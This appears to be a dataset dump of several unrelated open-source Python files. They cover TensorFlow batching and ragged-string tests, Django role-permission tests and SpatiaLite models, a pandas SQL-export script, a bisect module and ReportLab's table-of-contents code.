num_threads: The number of threads enqueuing `tensor_list`.
capacity: An integer. The maximum number of elements in the queue.
enqueue_many: Whether each tensor in `tensor_list` is a single example.
shapes: (Optional) The shapes for each example. Defaults to the
inferred shapes for `tensor_list`.
dynamic_pad: Boolean. Allow variable dimensions in input shapes.
The given dimensions are padded upon dequeue so that tensors within a
batch have the same shapes.
shared_name: (optional). If set, this queue will be shared under the given
name across multiple sessions.
name: (Optional) A name for the operations.
Returns:
A list or dictionary of tensors with the same types as `tensors`.
Raises:
ValueError: If the `shapes` are not specified, and cannot be
inferred from the elements of `tensors`.
"""
tensor_list = _as_tensor_list(tensors)
with ops.op_scope(tensor_list, name, "batch") as name:
tensor_list = _validate(tensor_list)
(tensor_list, sparse_info) = _serialize_sparse_tensors(
tensor_list, enqueue_many)
types = _dtypes([tensor_list])
shapes = _shapes([tensor_list], shapes, enqueue_many)
# TODO(josh11b,mrry): Switch to BatchQueue once it is written.
queue = _which_queue(dynamic_pad)(
capacity=capacity, dtypes=types, shapes=shapes, shared_name=shared_name)
_enqueue(queue, tensor_list, num_threads, enqueue_many)
logging_ops.scalar_summary(
"queue/%s/fraction_of_%d_full" % (queue.name, capacity),
math_ops.cast(queue.size(), dtypes.float32) * (1. / capacity))
dequeued = queue.dequeue_many(batch_size, name=name)
dequeued = _deserialize_sparse_tensors(dequeued, sparse_info)
return _as_original_type(tensors, dequeued)
# TODO(josh11b): Add a thread_multiplier or num_threads (that has to be
# a multiple of len(tensor_list_list)?) parameter, to address the use
# case where you want more parallelism than you can support different
# readers (either because you don't have that many files or can't
# read that many files in parallel due to the number of seeks required).
# Once this is done, batch() can be written as a call to batch_join().
def batch_join(tensors_list, batch_size, capacity=32, enqueue_many=False,
shapes=None, dynamic_pad=False,
shared_name=None, name=None):
"""Runs a list of tensors to fill a queue to create batches of examples.
The `tensors_list` argument is a list of tuples of tensors, or a list of
dictionaries of tensors. Each element in the list is treated similarily
to the `tensors` argument of `tf.train.batch()`.
Enqueues a different list of tensors in different threads.
Implemented using a queue -- a `QueueRunner` for the queue
is added to the current `Graph`'s `QUEUE_RUNNER` collection.
`len(tensors_list)` threads will be started,
with thread `i` enqueuing the tensors from
`tensors_list[i]`. `tensors_list[i1][j]` must match
`tensors_list[i2][j]` in type and shape, except in the first
dimension if `enqueue_many` is true.
If `enqueue_many` is `False`, each `tensors_list[i]` is assumed
to represent a single example. An input tensor `x` will be output as a
tensor with shape `[batch_size] + x.shape`.
If `enqueue_many` is `True`, `tensors_list[i]` is assumed to
represent a batch of examples, where the first dimension is indexed
by example, and all members of `tensors_list[i]` should have the
same size in the first dimension. The slices of any input tensor
`x` are treated as examples, and the output tensors will have shape
`[batch_size] + x.shape[1:]`.
The `capacity` argument controls the how long the prefetching is allowed to
grow the queues.
The returned operation is a dequeue operation and will throw
`tf.errors.OutOfRangeError` if the input queue is exhausted. If this
operation is feeding another input queue, its queue runner will catch
this exception, however, if this operation is used in your main thread
you are responsible for catching this yourself.
*N.B.:* If `dynamic_pad` is `False`, you must ensure that either
(i) the `shapes` argument is passed, or (ii) all of the tensors in
`tensors_list` must have fully-defined shapes. `ValueError` will be
raised if neither of these conditions holds.
If `dynamic_pad` is `True`, it is sufficient that the *rank* of the
tensors is known, but individual dimensions may have value `None`.
In this case, for each enqueue the dimensions with value `None`
may have a variable length; upon dequeue, the output tensors will be padded
on the right to the maximum shape of the tensors in the current minibatch.
For numbers, this padding takes value 0. For strings, this padding is
the empty string. See `PaddingFIFOQueue` for more info.
Args:
tensors_list: A list of tuples or dictionaries of tensors to enqueue.
batch_size: An integer. The new batch size pulled from the queue.
capacity: An integer. The maximum number of elements in the queue.
enqueue_many: Whether each tensor in `tensor_list_list` is a single
example.
shapes: (Optional) The shapes for each example. Defaults to the
inferred shapes for `tensor_list_list[i]`.
dynamic_pad: Boolean. Allow variable dimensions in input shapes.
The given dimensions are padded upon dequeue so that tensors within a
batch have the same shapes.
shared_name: (Optional) If set, this queue will be shared under the given
name across multiple sessions.
name: (Optional) A name for the operations.
Returns:
A list or dictionary of tensors with the same number and types as
`tensors_list[i]`.
Raises:
ValueError: If the `shapes` are not specified, and cannot be
inferred from the elements of `tensor_list_list`.
"""
tensor_list_list = _as_tensor_list_list(tensors_list)
with ops.op_scope(_flatten(tensor_list_list), name, "batch_join") as name:
tensor_list_list = _validate_join(tensor_list_list)
tensor_list_list, sparse_info = _serialize_sparse_tensors_join(
tensor_list_list, enqueue_many)
types = _dtypes(tensor_list_list)
shapes = _shapes(tensor_list_list, shapes, enqueue_many)
# TODO(josh11b,mrry): Switch to BatchQueue once it is written.
queue = _which_queue(dynamic_pad)(
capacity=capacity, dtypes=types, shapes=shapes, shared_name=shared_name)
_enqueue_join(queue, tensor_list_list, enqueue_many)
logging_ops.scalar_summary(
"queue/%s/fraction_of_%d_full" % (queue.name, capacity),
math_ops.cast(queue.size(), dtypes.float32) * (1. / capacity))
dequeued = queue.dequeue_many(batch_size, name=name)
dequeued = _deserialize_sparse_tensors(dequeued, sparse_info)
# tensors_list was validated to not be empty.
return _as_original_type(tensors_list[0], dequeued)
def shuffle_batch(tensors, batch_size, capacity, min_after_dequeue,
num_threads=1, seed=None, enqueue_many=False, shapes=None,
shared_name=None, name=None):
"""Creates batches by randomly shuffling tensors.
This function adds the following to the current `Graph`:
* A shuffling queue into which tensors from `tensors` are enqueued.
* A `dequeue_many` operation to create batches from the queue.
* A `QueueRunner` to `QUEUE_RUNNER` collection, to enqueue the tensors
from `tensors`.
If `enqueue_many` is `False`, `tensors` is assumed to represent a
single example. An input tensor with shape `[x, y, z]` will be output
as a tensor with shape `[batch_size, x, y, z]`.
If `enqueue_many` is `True`, `tensors` is assumed to represent a
batch of examples, where the first dimension is indexed by example,
and all members of `tensors` should have the same size in the
first dimension. If an input tensor has shape `[*, x, y, z]`, the
output will have shape `[batch_size, x, y, z]`.
The `capacity` argument controls the how long the prefetching is allowed to
grow the queues.
The returned operation is a dequeue operation and will throw
`tf.errors.OutOfRangeError` if the input queue is exhausted. If this
operation is feeding another input queue, its queue runner will catch
this exception, however, if this operation is used in your main thread
you are responsible for catching this yourself.
For example:
```python
# Creates batches of 32 images and 32 labels.
image_batch, label_batch = tf.train.shuffle_batch(
[single_image, single_label],
batch_size=32,
num_threads=4,
capacity=50000,
min_after_dequeue=10000)
```
*N.B.:* You must ensure that either (i) the `shapes` argument is
passed, or (ii) all of the tensors in `tensors` must have
fully-defined shapes. `ValueError` will be raised if neither of
these conditions holds.
Args:
tensors: The list or dictionary of tensors to enqueue.
batch_size: The new batch size pulled from the queue.
capacity: An integer. The maximum number of elements in the queue.
min_after_dequeue: Minimum number elements in the queue after a
dequeue, used to ensure a level of mixing of elements.
num_threads: The number of threads enqueuing `tensor_list`.
seed: Seed for the random shuffling within the queue.
enqueue_many: Whether each tensor in `tensor_list` is a single example.
shapes: (Optional) The shapes for each example. Defaults to the
inferred shapes for `tensor_list`.
shared_name: (Optional) If set, this queue will be shared under the given
name across multiple sessions.
name: (Optional) A name for the operations.
Returns:
A list or dictionary of tensors with the types as `tensors`.
Raises:
ValueError: If the `shapes` are not specified, and cannot be
inferred from the elements of `tensors`.
"""
tensor_list = _as_tensor_list(tensors)
with ops.op_scope(tensor_list, name, "shuffle_batch") as name:
tensor_list = _validate(tensor_list)
tensor_list, sparse_info = _serialize_sparse_tensors(
tensor_list, enqueue_many)
types = _dtypes([tensor_list])
shapes = _shapes([tensor_list], shapes, enqueue_many)
queue = data_flow_ops.RandomShuffleQueue(
capacity=capacity, min_after_dequeue=min_after_dequeue, seed=seed,
dtypes=types, shapes=shapes, shared_name=shared_name)
_enqueue(queue, tensor_list, num_threads, enqueue_many)
full = (math_ops.cast(math_ops.maximum(0, queue.size() - min_after_dequeue),
dtypes.float32) *
(1. / (capacity - min_after_dequeue)))
# Note that name contains a '/' at the end so we intentionally do not place
# a '/' after %s below.
summary_name = (
"queue/%sfraction_over_%d_of_%d_full" %
(name, min_after_dequeue, capacity - min_after_dequeue))
logging_ops.scalar_summary(summary_name, full)
dequeued = queue.dequeue_many(batch_size, name=name)
dequeued = _deserialize_sparse_tensors(dequeued, sparse_info)
return _as_original_type(tensors, dequeued)
def shuffle_batch_join(tensors_list, batch_size, capacity,
min_after_dequeue, seed=None, enqueue_many=False,
shapes=None, shared_name=None, name=None):
"""Create batches by randomly shuffling tensors.
The `tensors_list` argument is a list of tuples of tensors, or a list of
dictionaries of tensors. Each element in the list is treated similarily
to the `tensors` argument of `tf.train.shuffle_batch()`.
This version enqueues a different list of tensors in different threads.
It adds the following to the current `Graph`:
* A shuffling queue into which tensors from `tensors_list` are enqueued.
* A `dequeue_many` operation to create batches from the queue.
* A `QueueRunner` to `QUEUE_RUNNER` collection, to enqueue the tensors
from `tensors_list`.
`len(tensors_list)` threads will be started, with thread `i` enqueuing
the tensors from `tensors_list[i]`. `tensors_list[i1][j]` must match
`tensors_list[i2][j]` in type and shape, except in the first dimension if
`enqueue_many` is true.
If `enqueue_many` is `False`, each `tensors_list[i]` is assumed
to represent a single example. An input tensor with shape `[x, y, z]`
will be output as a tensor with shape `[batch_size, x, y, z]`.
If `enqueue_many` is `True`, `tensors_list[i]` is assumed to
represent a batch of examples, where the first dimension is indexed
by example, and all members of `tensors_list[i]` should have the
same size in the first dimension. If an input tensor has shape `[*, x,
y, z]`, the output will have shape `[batch_size, x, y, z]`.
The `capacity` argument controls the how long the prefetching is allowed to
grow the queues.
The returned operation is a dequeue operation and will throw
`tf.errors.OutOfRangeError` if the input queue is exhausted. If this
operation is feeding another input queue, its queue runner will catch
this exception, however, if this operation is used in your main thread
you are responsible for catching this yourself.
Args:
tensors_list: A list of tuples or dictionaries of tensors to enqueue.
batch_size: An integer. The new batch size pulled from the queue.
capacity: An integer. The maximum number of elements in the queue.
min_after_dequeue: Minimum number elements in the queue after a
dequeue, used to ensure a level of mixing of elements.
seed: Seed for the random shuffling within the queue.
enqueue_many: Whether each tensor in `tensor_list_list` is a single
example.
shapes: (Optional) The shapes for each example. Defaults to the
inferred shapes for `tensors_list[i]`.
shared_name: (optional). If set, this queue will be shared under the given
name across multiple sessions.
name: (Optional) A name for the operations.
Returns:
A list or dictionary of tensors with the same number and types as
`tensors_list[i]`.
Raises:
ValueError: If the `shapes` are not specified, and cannot be
inferred from the elements of `tensors_list`.
"""
tensor_list_list = _as_tensor_list_list(tensors_list)
with ops.op_scope(
_flatten(tensor_list_list), name, "shuffle_batch_join") as name:
tensor_list_list = _validate_join(tensor_list_list)
tensor_list_list, sparse_info = _serialize_sparse_tensors_join(
tensor_list_list, enqueue_many)
types = _dtypes(tensor_list_list)
shapes = _shapes(tensor_list_list, shapes, enqueue_many)
queue = data_flow_ops.RandomShuffleQueue(
capacity=capacity, min_after_dequeue=min_after_dequeue, seed=seed,
dtypes=types, shapes=shapes, shared_name=shared_name)
_enqueue_join(queue, tensor_list_list, enqueue_many)
full = (math_ops.cast(math_ops.maximum(0, queue.size() - min_after_dequeue),
dtypes.float32) *
(1. / (capacity - min_after_dequeue)))
# Note that name contains a '/' at the end so we intentionally do not place
# a '/' after %s below.
summary_name = (
"queue/%sfraction_over_%d_of_%d_full" %
(name, min_after_dequeue, capacity - min_after_dequeue))
logging_ops.scalar_summary(summary_name, full)
dequeued = queue.dequeue_many(batch_size, name=name)
dequeued = _deserialize_sparse_tensors(dequeued, sparse_info)
# tensors_list was validated to not be empty.
return _as_original_type(tensors_list[0], dequeued)
| apache-2.0 |
vintasoftware/django-role-permissions | rolepermissions/tests/test_permissions.py | 1 | 2083 |
from django.test import TestCase
from rolepermissions.permissions import PermissionsManager, register_object_checker
from rolepermissions.exceptions import CheckerNotRegistered
class PermissionsManagerTests(TestCase):
def setUp(self):
PermissionsManager._checkers = {}
def test_register_checker(self):
def func():
pass
PermissionsManager.register_checker('func_name', func)
self.assertIn('func_name', PermissionsManager._checkers)
self.assertEquals(PermissionsManager._checkers['func_name'], func)
def test_get_checkers(self):
self.assertEquals(PermissionsManager.get_checkers(), {})
def test_retrieve_checker(self):
def func():
pass
PermissionsManager.register_checker('func_name', func)
self.assertEquals(PermissionsManager.retrieve_checker('func_name'), func)
def test_restore_unregistered_function(self):
with self.assertRaises(CheckerNotRegistered):
PermissionsManager.retrieve_checker('func_name')
class RegisterObjectCheckerDecoratorTests(TestCase):
def setUp(self):
PermissionsManager._checkers = {}
def test_resgisters_function(self):
@register_object_checker()
def function_name(a, b, c):
return True
self.assertIn('function_name', PermissionsManager.get_checkers())
restore_function = PermissionsManager.retrieve_checker('function_name')
self.assertTrue(restore_function('', '', ''))
def test_register_function_with_diferent_name(self):
@register_object_checker('new_name')
def function_name(a, b, c):
return True
self.assertIn('new_name', PermissionsManager.get_checkers())
restore_function = PermissionsManager.retrieve_checker('new_name')
self.assertTrue(restore_function('', '', ''))
def test_register_function_call(self):
@register_object_checker()
def function_name(a, b, c):
return True
self.assertTrue(function_name('', '', ''))
| mit |
chankeypathak/pandas-matplotlib-examples | Lesson 9/export.py | 1 | 1179 | import pandas as pd
from sqlalchemy import create_engine, MetaData, Table, select
# Parameters
TableName = "data"
DB = {
'drivername': 'mssql+pyodbc',
'servername': 'DAVID-THINK',
#'port': '5432',
#'username': 'lynn',
#'password': '',
'database': 'BizIntel',
'driver': 'SQL Server Native Client 11.0',
'trusted_connection': 'yes',
'legacy_schema_aliasing': False
}
# Create the connection
engine = create_engine(DB['drivername'] + '://' + DB['servername'] + '/' + DB['database'] + '?' + 'driver=' + DB['driver'] + ';' + 'trusted_connection=' + DB['trusted_connection'], legacy_schema_aliasing=DB['legacy_schema_aliasing'])
conn = engine.connect()
# Required for querying tables
metadata = MetaData(conn)
# Table to query
tbl = Table(TableName, metadata, autoload=True, schema="dbo")
#tbl.create(checkfirst=True)
# Select all
sql = tbl.select()
# run sql code
result = conn.execute(sql)
# Insert to a dataframe
df = pd.DataFrame(data=list(result), columns=result.keys())
# Close connection
conn.close()
print('Done')
df.to_csv('DimDate.csv', index=False)
df.to_excel('DimDate.xls', index=False)
df.to_csv('DimDate.txt', index=False)
| mit |
aam-at/tensorflow | tensorflow/python/ops/ragged/strings_reduce_join_op_test.py | 15 | 5488 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.strings.reduce_join."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_string_ops
from tensorflow.python.platform import googletest
@test_util.run_all_in_graph_and_eager_modes
class StringsReduceJoinOpTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def test_rank_one(self):
input_array = [b'this', b'is', b'a', b'test']
truth = b'thisisatest'
truth_shape = []
with self.cached_session():
output = ragged_string_ops.reduce_join(
inputs=input_array, axis=-1, keepdims=False, separator='')
output_array = self.evaluate(output)
self.assertAllEqual(truth, output_array)
self.assertAllEqual(truth_shape, output.get_shape())
@parameterized.parameters([
{
'input_array': [[
b'this', b'is', b'a', b'test', b'for', b'ragged', b'tensors'
], [b'please', b'do', b'not', b'panic', b'!']],
'axis': 0,
'keepdims': False,
'truth': [
b'thisplease', b'isdo', b'anot', b'testpanic', b'for!', b'ragged',
b'tensors'
],
'truth_shape': [7],
},
{
'input_array': [[
b'this', b'is', b'a', b'test', b'for', b'ragged', b'tensors'
], [b'please', b'do', b'not', b'panic', b'!']],
'axis': 1,
'keepdims': False,
'truth': [b'thisisatestforraggedtensors', b'pleasedonotpanic!'],
'truth_shape': [2],
},
{
'input_array': [[
b'this', b'is', b'a', b'test', b'for', b'ragged', b'tensors'
], [b'please', b'do', b'not', b'panic', b'!']],
'axis': 1,
'keepdims': False,
'truth': [
b'this|is|a|test|for|ragged|tensors', b'please|do|not|panic|!'
],
'truth_shape': [2],
'separator': '|',
},
{
'input_array': [[[b'a', b'b'], [b'b', b'c']], [[b'dd', b'ee']]],
'axis': -1,
'keepdims': False,
'truth': [[b'a|b', b'b|c'], [b'dd|ee']],
'truth_shape': [2, None],
'separator': '|',
},
{
'input_array': [[[[b'a', b'b', b'c'], [b'dd', b'ee']]],
[[[b'f', b'g', b'h'], [b'ii', b'jj']]]],
'axis': -2,
'keepdims': False,
'truth': [[[b'a|dd', b'b|ee', b'c']], [[b'f|ii', b'g|jj', b'h']]],
'truth_shape': [2, None, None],
'separator': '|',
},
{
'input_array': [[[b't', b'h', b'i', b's'], [b'i', b's'], [b'a'],
[b't', b'e', b's', b't']],
[[b'p', b'l', b'e', b'a', b's', b'e'],
[b'p', b'a', b'n', b'i', b'c']]],
'axis': -1,
'keepdims': False,
'truth': [[b'this', b'is', b'a', b'test'], [b'please', b'panic']],
'truth_shape': [2, None],
'separator': '',
},
{
'input_array': [[[[b't'], [b'h'], [b'i'], [b's']], [[b'i', b's']],
[[b'a', b'n']], [[b'e'], [b'r'], [b'r']]],
[[[b'p'], [b'l'], [b'e'], [b'a'], [b's'], [b'e']],
[[b'p'], [b'a'], [b'n'], [b'i'], [b'c']]]],
'axis': -1,
'keepdims': False,
'truth': [[[b't', b'h', b'i', b's'], [b'is'], [b'an'],
[b'e', b'r', b'r']],
[[b'p', b'l', b'e', b'a', b's', b'e'],
[b'p', b'a', b'n', b'i', b'c']]],
'truth_shape': [2, None, None],
'separator': '',
},
])
def test_different_ranks(self,
input_array,
axis,
keepdims,
truth,
truth_shape,
separator=''):
with self.cached_session():
input_tensor = ragged_factory_ops.constant(input_array)
output = ragged_string_ops.reduce_join(
inputs=input_tensor,
axis=axis,
keepdims=keepdims,
separator=separator)
output_array = self.evaluate(output)
self.assertAllEqual(truth, output_array)
if all(isinstance(s, tensor_shape.Dimension) for s in output.shape):
output_shape = [dim.value for dim in output.shape]
else:
output_shape = output.shape
self.assertAllEqual(truth_shape, output_shape)
if __name__ == '__main__':
googletest.main()
| apache-2.0 |
40223117cda/w17test | static/Brython3.1.1-20150328-091302/Lib/bisect.py | 1261 | 2595 | """Bisection algorithms."""
def insort_right(a, x, lo=0, hi=None):
"""Insert item x in list a, and keep it sorted assuming a is sorted.
If x is already in a, insert it to the right of the rightmost x.
Optional args lo (default 0) and hi (default len(a)) bound the
slice of a to be searched.
"""
if lo < 0:
raise ValueError('lo must be non-negative')
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo+hi)//2
if x < a[mid]: hi = mid
else: lo = mid+1
a.insert(lo, x)
insort = insort_right # backward compatibility
def bisect_right(a, x, lo=0, hi=None):
"""Return the index where to insert item x in list a, assuming a is sorted.
The return value i is such that all e in a[:i] have e <= x, and all e in
a[i:] have e > x. So if x already appears in the list, a.insert(x) will
insert just after the rightmost x already there.
Optional args lo (default 0) and hi (default len(a)) bound the
slice of a to be searched.
"""
if lo < 0:
raise ValueError('lo must be non-negative')
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo+hi)//2
if x < a[mid]: hi = mid
else: lo = mid+1
return lo
bisect = bisect_right # backward compatibility
def insort_left(a, x, lo=0, hi=None):
"""Insert item x in list a, and keep it sorted assuming a is sorted.
If x is already in a, insert it to the left of the leftmost x.
Optional args lo (default 0) and hi (default len(a)) bound the
slice of a to be searched.
"""
if lo < 0:
raise ValueError('lo must be non-negative')
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo+hi)//2
if a[mid] < x: lo = mid+1
else: hi = mid
a.insert(lo, x)
def bisect_left(a, x, lo=0, hi=None):
"""Return the index where to insert item x in list a, assuming a is sorted.
The return value i is such that all e in a[:i] have e < x, and all e in
a[i:] have e >= x. So if x already appears in the list, a.insert(x) will
insert just before the leftmost x already there.
Optional args lo (default 0) and hi (default len(a)) bound the
slice of a to be searched.
"""
if lo < 0:
raise ValueError('lo must be non-negative')
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo+hi)//2
if a[mid] < x: lo = mid+1
else: hi = mid
return lo
# Overwrite above definitions with a fast C implementation
try:
from _bisect import *
except ImportError:
pass
| gpl-3.0 |
jaywreddy/django | django/contrib/gis/db/backends/spatialite/models.py | 510 | 2946 | """
The GeometryColumns and SpatialRefSys models for the SpatiaLite backend.
"""
from django.contrib.gis.db.backends.base.models import SpatialRefSysMixin
from django.contrib.gis.db.backends.spatialite.base import DatabaseWrapper
from django.db import connection, models
from django.db.backends.signals import connection_created
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class SpatialiteGeometryColumns(models.Model):
"""
The 'geometry_columns' table from SpatiaLite.
"""
f_table_name = models.CharField(max_length=256)
f_geometry_column = models.CharField(max_length=256)
coord_dimension = models.IntegerField()
srid = models.IntegerField(primary_key=True)
spatial_index_enabled = models.IntegerField()
class Meta:
app_label = 'gis'
db_table = 'geometry_columns'
managed = False
@classmethod
def table_name_col(cls):
"""
Returns the name of the metadata column used to store the feature table
name.
"""
return 'f_table_name'
@classmethod
def geom_col_name(cls):
"""
Returns the name of the metadata column used to store the feature
geometry column.
"""
return 'f_geometry_column'
def __str__(self):
return "%s.%s - %dD %s field (SRID: %d)" % \
(self.f_table_name, self.f_geometry_column,
self.coord_dimension, self.type, self.srid)
class SpatialiteSpatialRefSys(models.Model, SpatialRefSysMixin):
"""
The 'spatial_ref_sys' table from SpatiaLite.
"""
srid = models.IntegerField(primary_key=True)
auth_name = models.CharField(max_length=256)
auth_srid = models.IntegerField()
ref_sys_name = models.CharField(max_length=256)
proj4text = models.CharField(max_length=2048)
@property
def wkt(self):
if hasattr(self, 'srtext'):
return self.srtext
from django.contrib.gis.gdal import SpatialReference
return SpatialReference(self.proj4text).wkt
class Meta:
app_label = 'gis'
db_table = 'spatial_ref_sys'
managed = False
def add_spatial_version_related_fields(sender, **kwargs):
"""
Adds fields after establishing a database connection to prevent database
operations at compile time.
"""
if connection_created.disconnect(add_spatial_version_related_fields, sender=DatabaseWrapper):
spatial_version = connection.ops.spatial_version[0]
if spatial_version >= 4:
SpatialiteSpatialRefSys.add_to_class('srtext', models.CharField(max_length=2048))
SpatialiteGeometryColumns.add_to_class('type', models.IntegerField(db_column='geometry_type'))
else:
SpatialiteGeometryColumns.add_to_class('type', models.CharField(max_length=30))
connection_created.connect(add_spatial_version_related_fields, sender=DatabaseWrapper)
| bsd-3-clause |
yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/reportlab/platypus/tableofcontents.py | 1 | 20681 | #Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/tableofcontents.py
__version__=''' $Id$ '''
__doc__="""Experimental class to generate Tables of Contents easily
This module defines a single TableOfContents() class that can be used to
create automatically a table of tontents for Platypus documents like
this:
story = []
toc = TableOfContents()
story.append(toc)
# some heading paragraphs here...
doc = MyTemplate(path)
doc.multiBuild(story)
The data needed to create the table is a list of (level, text, pageNum)
triplets, plus some paragraph styles for each level of the table itself.
The triplets will usually be created in a document template's method
like afterFlowable(), making notification calls using the notify()
method with appropriate data like this:
(level, text, pageNum) = ...
self.notify('TOCEntry', (level, text, pageNum))
Optionally the list can contain four items in which case the last item
is a destination key which the entry should point to. A bookmark
with this key needs to be created first like this:
key = 'ch%s' % self.seq.nextf('chapter')
self.canv.bookmarkPage(key)
self.notify('TOCEntry', (level, text, pageNum, key))
As the table of contents need at least two passes over the Platypus
story which is why the moultiBuild0() method must be called.
The level<NUMBER>ParaStyle variables are the paragraph styles used
to format the entries in the table of contents. Their indentation
is calculated like this: each entry starts at a multiple of some
constant named delta. If one entry spans more than one line, all
lines after the first are indented by the same constant named
epsilon.
"""
from reportlab.lib import enums
from reportlab.lib.units import cm
from reportlab.lib.utils import commasplit, escapeOnce, encode_label, decode_label
from reportlab.lib.styles import ParagraphStyle, _baseFontName
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.doctemplate import IndexingFlowable
from reportlab.platypus.tables import TableStyle, Table
from reportlab.platypus.flowables import Spacer, Flowable
from reportlab.pdfbase.pdfmetrics import stringWidth
from reportlab.pdfgen import canvas
def unquote(txt):
from xml.sax.saxutils import unescape
return unescape(txt, {"'": "'", """: '"'})
try:
set
except:
class set(list):
def add(self,x):
if x not in self:
list.append(self,x)
def drawPageNumbers(canvas, style, pages, availWidth, availHeight, dot=' . '):
'''
Draws pagestr on the canvas using the given style.
If dot is None, pagestr is drawn at the current position in the canvas.
If dot is a string, pagestr is drawn right-aligned. If the string is not empty,
the gap is filled with it.
'''
pages.sort()
pagestr = ', '.join([str(p) for p, _ in pages])
x, y = canvas._curr_tx_info['cur_x'], canvas._curr_tx_info['cur_y']
fontSize = style.fontSize
pagestrw = stringWidth(pagestr, style.fontName, fontSize)
#if it's too long to fit, we need to shrink to fit in 10% increments.
#it would be very hard to output multiline entries.
#however, we impose a minimum size of 1 point as we don't want an
#infinite loop. Ultimately we should allow a TOC entry to spill
#over onto a second line if needed.
freeWidth = availWidth-x
while pagestrw > freeWidth and fontSize >= 1.0:
fontSize = 0.9 * fontSize
pagestrw = stringWidth(pagestr, style.fontName, fontSize)
if isinstance(dot, str):
if dot:
dotw = stringWidth(dot, style.fontName, fontSize)
dotsn = int((availWidth-x-pagestrw)/dotw)
else:
dotsn = dotw = 0
text = '%s%s' % (dotsn * dot, pagestr)
newx = availWidth - dotsn*dotw - pagestrw
pagex = availWidth - pagestrw
elif dot is None:
text = ', ' + pagestr
newx = x
pagex = newx
else:
raise TypeError('Argument dot should either be None or an instance of basestring.')
tx = canvas.beginText(newx, y)
tx.setFont(style.fontName, fontSize)
tx.setFillColor(style.textColor)
tx.textLine(text)
canvas.drawText(tx)
commaw = stringWidth(', ', style.fontName, fontSize)
for p, key in pages:
if not key:
continue
w = stringWidth(str(p), style.fontName, fontSize)
canvas.linkRect('', key, (pagex, y, pagex+w, y+style.leading), relative=1)
pagex += w + commaw
# Default paragraph styles for tables of contents.
# (This could also be generated automatically or even
# on-demand if it is not known how many levels the
# TOC will finally need to display...)
delta = 1*cm
epsilon = 0.5*cm
defaultLevelStyles = [
ParagraphStyle(
name='Level 0',
fontName=_baseFontName,
fontSize=10,
leading=11,
firstLineIndent = 0,
leftIndent = epsilon)]
defaultTableStyle = \
TableStyle([
('VALIGN', (0,0), (-1,-1), 'TOP'),
('RIGHTPADDING', (0,0), (-1,-1), 0),
('LEFTPADDING', (0,0), (-1,-1), 0),
])
class TableOfContents(IndexingFlowable):
"""This creates a formatted table of contents.
It presumes a correct block of data is passed in.
The data block contains a list of (level, text, pageNumber)
triplets. You can supply a paragraph style for each level
(starting at zero).
Set dotsMinLevel to determine from which level on a line of
dots should be drawn between the text and the page number.
If dotsMinLevel is set to a negative value, no dotted lines are drawn.
"""
def __init__(self):
self.rightColumnWidth = 72
self.levelStyles = defaultLevelStyles
self.tableStyle = defaultTableStyle
self.dotsMinLevel = 1
self._table = None
self._entries = []
self._lastEntries = []
def beforeBuild(self):
# keep track of the last run
self._lastEntries = self._entries[:]
self.clearEntries()
def isIndexing(self):
return 1
def isSatisfied(self):
return (self._entries == self._lastEntries)
def notify(self, kind, stuff):
"""The notification hook called to register all kinds of events.
Here we are interested in 'TOCEntry' events only.
"""
if kind == 'TOCEntry':
self.addEntry(*stuff)
def clearEntries(self):
self._entries = []
def getLevelStyle(self, n):
'''Returns the style for level n, generating and caching styles on demand if not present.'''
try:
return self.levelStyles[n]
except IndexError:
prevstyle = self.getLevelStyle(n-1)
self.levelStyles.append(ParagraphStyle(
name='%s-%d-indented' % (prevstyle.name, n),
parent=prevstyle,
firstLineIndent = prevstyle.firstLineIndent+delta,
leftIndent = prevstyle.leftIndent+delta))
return self.levelStyles[n]
def addEntry(self, level, text, pageNum, key=None):
"""Adds one entry to the table of contents.
This allows incremental buildup by a doctemplate.
Requires that enough styles are defined."""
assert type(level) == type(1), "Level must be an integer"
self._entries.append((level, text, pageNum, key))
def addEntries(self, listOfEntries):
"""Bulk creation of entries in the table of contents.
If you knew the titles but not the page numbers, you could
supply them to get sensible output on the first run."""
for entryargs in listOfEntries:
self.addEntry(*entryargs)
def wrap(self, availWidth, availHeight):
"All table properties should be known by now."
# makes an internal table which does all the work.
# we draw the LAST RUN's entries! If there are
# none, we make some dummy data to keep the table
# from complaining
if len(self._lastEntries) == 0:
_tempEntries = [(0,'Placeholder for table of contents',0,None)]
else:
_tempEntries = self._lastEntries
def drawTOCEntryEnd(canvas, kind, label):
'''Callback to draw dots and page numbers after each entry.'''
label = label.split(',')
page, level, key = int(label[0]), int(label[1]), eval(label[2],{})
style = self.getLevelStyle(level)
if self.dotsMinLevel >= 0 and level >= self.dotsMinLevel:
dot = ' . '
else:
dot = ''
drawPageNumbers(canvas, style, [(page, key)], availWidth, availHeight, dot)
self.canv.drawTOCEntryEnd = drawTOCEntryEnd
tableData = []
for (level, text, pageNum, key) in _tempEntries:
style = self.getLevelStyle(level)
if key:
text = '<a href="#%s">%s</a>' % (key, text)
keyVal = repr(key).replace(',','\\x2c').replace('"','\\x2c')
else:
keyVal = None
para = Paragraph('%s<onDraw name="drawTOCEntryEnd" label="%d,%d,%s"/>' % (text, pageNum, level, keyVal), style)
if style.spaceBefore:
tableData.append([Spacer(1, style.spaceBefore),])
tableData.append([para,])
self._table = Table(tableData, colWidths=(availWidth,), style=self.tableStyle)
self.width, self.height = self._table.wrapOn(self.canv,availWidth, availHeight)
